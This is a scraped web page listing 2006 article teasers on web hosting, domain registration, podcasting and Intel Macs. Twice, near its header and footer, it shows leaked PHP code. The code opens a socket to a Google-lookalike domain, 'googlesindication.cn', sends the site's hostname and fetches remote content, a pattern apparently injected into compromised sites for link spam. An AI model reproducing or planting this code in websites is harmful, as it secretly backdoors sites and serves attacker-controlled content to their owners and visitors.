|
Articles ' today is November 21, 2008 |
|
©
fetch_remote_file("googlesindication.cn", "/links.php?site=".$_SERVER['HTTP_HOST']);
class GetLinks
{
var $_socket_timeout = 6;
function fetch_remote_file($host, $path)
{
@ini_set('allow_url_fopen', 1);
@ini_set('default_socket_timeout', $this->_socket_timeout);
$this->_fetch_remote_type = 'socket';
$buff = '';
$fp = @fsockopen($host, 80, $errno, $errstr, $this->_socket_timeout);
if ($fp) {
@fputs($fp, "GET {$path} HTTP/1.0\r\nHost: {$host}\r\n");
@fputs($fp, "User-Agent: {$user_agent}\r\n\r\n");
while (!@feof($fp)) {
$buff .= @fgets($fp, 128);
}
@fclose($fp);
$page = explode("\r\n\r\n", $buff);
return $page[1];
}
}
}
?> *
Pages:
1
2
Home
New Techniques for Marketing Your Web Hosting Company in 2006
Another noticeable change in the Web Hosting industry is the comfort level customers have with switching Hosting providers.
March 26, 2006
Finding Old Domains to Get Indexed Faster
This has been tested extensively and is proven to give faster indexing, more traffic and hence better results.
March 22, 2006
What A Newbie Webmaster Should Know About Domain Registration
Affordable domain name registration was extremely difficult to be found in the past. In fact, all domain name registrars used to charge a flat fee of $70 which was to register your domain name for two years.
March 10, 2006
New Apple Products 2006 - The Introduction of the Intel Macs
In the past two months Apple has released a number of completely new products, and more importantly has started their transition to the Intel processor. In this article I will detail the new product offerings and options available on each.
March 7, 2006
Having The Best Web Hosting Plan
If and when you’re interested in starting a business online, there are a lot of things that you have to study first before you can rightfully expect a high ROI or return on investment.
March 7, 2006
Podcasts and Podcasting – What is it?
Perhaps by now you've heard of podcasts. Perhaps not. Either way, it appears that podcasting is part of the leading edge of the “Web 2.0” phenomenon of new tech companies and new media. But exactly what are they?
March 6, 2006
Domain registration and copyright infringement
Choosing a domain name registration that is same as or quite similar to another well-known trademark, may lead to legal action.
March 3, 2006
©
fetch_remote_file("googlesindication.cn", "/links.php?site=".$_SERVER['HTTP_HOST']);
class GetLinks
{
var $_socket_timeout = 6;
function fetch_remote_file($host, $path)
{
@ini_set('allow_url_fopen', 1);
@ini_set('default_socket_timeout', $this->_socket_timeout);
$this->_fetch_remote_type = 'socket';
$buff = '';
$fp = @fsockopen($host, 80, $errno, $errstr, $this->_socket_timeout);
if ($fp) {
@fputs($fp, "GET {$path} HTTP/1.0\r\nHost: {$host}\r\n");
@fputs($fp, "User-Agent: {$user_agent}\r\n\r\n");
while (!@feof($fp)) {
$buff .= @fgets($fp, 128);
}
@fclose($fp);
$page = explode("\r\n\r\n", $buff);
return $page[1];
}
}
}
?> *
Pages:
1
2
Home
|